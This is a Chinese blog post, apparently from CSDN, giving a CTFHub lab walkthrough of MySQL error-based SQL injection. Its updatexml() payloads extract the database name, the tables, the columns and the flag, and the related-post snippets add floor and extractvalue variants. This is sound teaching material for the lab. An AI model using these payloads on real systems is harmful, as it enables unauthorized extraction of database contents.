CTFHUB-SQL注入-报错注入

最新推荐文章于 2023-09-09 11:33:15 发布
最新推荐文章于 2023-09-09 11:33:15 发布
阅读量2.2k 收藏 13
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xixihahawuwu/article/details/112211987
版权

CTFHUB-SQL注入-报错注入

本文所使用到的一些函数的使用我去找了一些博主的文章,放在文章末尾了
首先进入环境查询1
在这里插入图片描述回显正常
接着查询1’
在这里插入图片描述页面回显报错,这里就要想着利用数据库的一些机制去进行人为的制造错误,使我们要查询的信息出现在报错信息中
使用updatexml()报错注入来获取信息
输入sql语句

1 union select updatexml(1,concat(0x7e,database(),0x7e),1);

在这里插入图片描述获取到数据库名:sqli
接着查询表

1 union select updatexml(1,concat(0x7e, (select(group_concat(table_name))from information_schema.tables where table_schema="sqli") ,0x7e),1);

在这里插入图片描述得到news和flag两个表名
接着查询flag表中的列

1 union select updatexml(1,concat(0x7e, (select(group_concat(column_name))from information_schema.columns where table_name="flag") ,0x7e),1);

在这里插入图片描述
查询结果列名为:flag
查询内容

1 union select updatexml(1,concat(0x7e, (select(group_concat(flag)) from sqli.flag) ,0x7e),1);

在这里插入图片描述然而由于回显长度的限制,没有完全返回所有值,使用right函数让后半部分的内容回显出来

1 union select updatexml(1,concat(0x7e, right((select(group_concat(flag)) from sqli.flag) ,31),0x7e),1);

在这里插入图片描述
这里的flag是动态刷新的,所以查询结果不一样,长度也会不一样

一、updatexml函数

UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称。
第二个参数:XPath_string (Xpath格式的字符串) 。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
作用:改变文档中符合条件的节点的值。

由于updatexml的第二个参数需要Xpath格式的字符串,以~开头的内容不是xml格式的语法,concat()函数为字符串连接函数显然不符合规则,但是会将括号内的执行结果以错误的形式报出,这样就可以实现报错注入了。

同样的,还可以利用floor()、extractvalue()等函数进行报错注入,可见https://www.cnblogs.com/wocalieshenmegui/p/5917967.html。

二、常用函数

right(str, num):字符串从右开始截取num个字符
left(str,num):字符串从左开始截取num个字符
substr(str,N,M): 字符串从第N个字符开始,截取M个字符

一名无聊的网友
关注
  • 5
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
web-注入-皮卡丘靶场
07-15
注入】是一种安全漏洞,它发生在Web应用程序中,当用户输入的数据被误地用于构造数据库查询时,导致数据库返回误信息。这些误信息可能包含敏感数据,从而让攻击者能够获取未授权的信息或者控制数据库。...
php登录页面实现-SQL注入
03-07
然而,如果不正确地处理用户输入,登录页面可能会遭受SQL注入攻击。下面将详细讨论PHP登录页面实现及其与SQL注入的相关知识点。 1. PHP登录页面基础: - `conn.php`:这个文件通常包含数据库连接代码,使用PHP的`...
CTFHub - 注入
最新发布
Have_a_great_day的博客
09-09 596
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
【ctfhub】SQL注入注入
manerzi的博客
10-08 251
SQL注入注入
CTFHUB-注入
Web学习之路
03-21 228
理解
CTFHub 注入
weixin_44732566的博客
02-20 4196
CTFHub 注入注入点不回显数据库查询的数据,那么通过一般的注入手段是无法返回相关数据库的信息,但是,如果查询时输入误SQL代码会,并且是通过mysql_error(),mysqli_error()等返回误。 ...
CTF学习笔记:SQL注入(显注入)
a12332251的博客
12-07 715
SQL注入
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库。MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
SQLmap-SQL注入
03-12
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问...
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
十种MySQL注入
BAM9090的博客
09-28 551
以下均摘自《代码审计:企业级Web代码安全架构》一书 1.floor() select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2.extrac...
CTF中Web各种题目的解题姿势
05-25
Web题型是CTF中常考题型之一,它将实际渗透过程中的技术技巧转化为CTF赛题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
CTFHub笔记之技能树-web:注入
weixin_48799157的博客
03-19 390
小白一个,如有误请指正! 对这方面不是很熟悉,补了一下知识点: https://blog.csdn.net/silence1_/article/details/90812612https://blog.csdn.net/silence1_/article/details/90812612 解法一: 1.用extractvalue()函数爆数据库 select * from news where id=1 and (select extractvalue(1,concat(0x7e,(select
buuctf-Fakebook(注入
m0_62094846的博客
04-04 2392
blog要有http:// 可以尝试sql注入,但是我用sqlmap注入不了,不知道为什么 然后尝试手工,试过很多闭合方式都不行,后来发现直接就是整型注入 正确的情况不会有回显,误会有,试试注入 这里有个之前没见过的过滤方式,过滤了0x7e,要用~(本来以为过滤了updatexml,想用另一个来着) 查当前数据库 ?no=1 and updatexml(1,concat('~',(database()),'~'),1)# 查所有数据库 ?no=1 and...
CTFHub 技能树之注入
qq_47271638的博客
05-28 498
首先测试注入点 and1=1 ;'and 1=1 ;'and 1=2, ?id=2-1;一起加上测试 发现没有回显初步判断可能是注入或者是时间盲注或者布尔盲注; 假设为注入. 查询数据库 构造注入语句 : ?id=1 and updatexml(1,concat(’~’,(select database())),1)– 得到数据库名:sqli 查询数据表 构造注入语句:?id=1 and updatexml(1,concat(’~’,(select group_concat(table_name
ctfhub-注入
m0_62094846的博客
12-22 439
查找库名 1 and extractvalue(1,concat(0x7e,database(),0x7e)) 查找表名 1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) 查找字段 1 and extractvalue(1,concat(0x7e,(select gr..
SQL注入学习记录 CTFHub SQL注入 注入
qq_45653588的博客
05-25 784
注入 注入在没法用union联合查询时用,但前提还是不能过滤一些关键的函数。 注入就是利用了数据库的某些机制,人为地制造误条件,使得查询结果能够出现在误信息中。 write up 打开页面后还是熟悉的界面,输入1后提示我们查询正确: 然后输入1': 爆出了误,并且将误回显在了页面上,我们这里可以使用updatexml()注入来获取我们想要的信息。 输入1 union select updatexml(1,concat(0x7e,database(),0x7e),1);,页面
【CTF整理】CTFhub技能树-Web-SQL注入
SunnyCat
05-10 2083
【CTF整理】CTFhub技能树-Web-SQL注入 目录【CTF整理】CTFhub技能树-Web-SQL注入SQL整数型注入SQL字符型注入SQL注入SQL布尔型注入SQL时间注入MySQL结构Cookie注入UA注入Referer注入 SQL整数型注入 确定闭合方式 :1 确定位有2个,(我选2注入点) 得到库名 得到表名 得到列名 得到flag SQL字符型注入 确定闭合方式:1’ 【步骤和整形一样,不再使用,我这里采用sqlmap】 核心语法: sqlmap -u "url+参
eazy-sql注入
06-03
你好,很抱歉听到你的代码出现了注入问题。通常情况下,避免 SQL 注入的方法是使用参数化查询。具体来说,使用参数化查询可以将用户输入的数据与 SQL 查询语句分开,从而避免恶意用户在输入时注入恶意 SQL 代码。 如果你使用的是 eazy-sql,可以在查询时使用 "?" 占位符来代替用户输入的数据,然后在执行查询时将占位符替换为具体的值即可。例如: ``` const username = req.body.username; const password = req.body.password; const sql = "SELECT * FROM users WHERE username = ? AND password = ?"; const result = await db.query(sql, [username, password]); ``` 这样可以有效避免 SQL 注入攻击。同时,在接收用户输入时,也应该进行必要的过滤和验证,确保输入的数据符合预期的格式和范围。 希望这些信息能帮到你解决问题。如果你还有其他问题或需要进一步的帮助,请随时问我。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一名无聊的网友

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值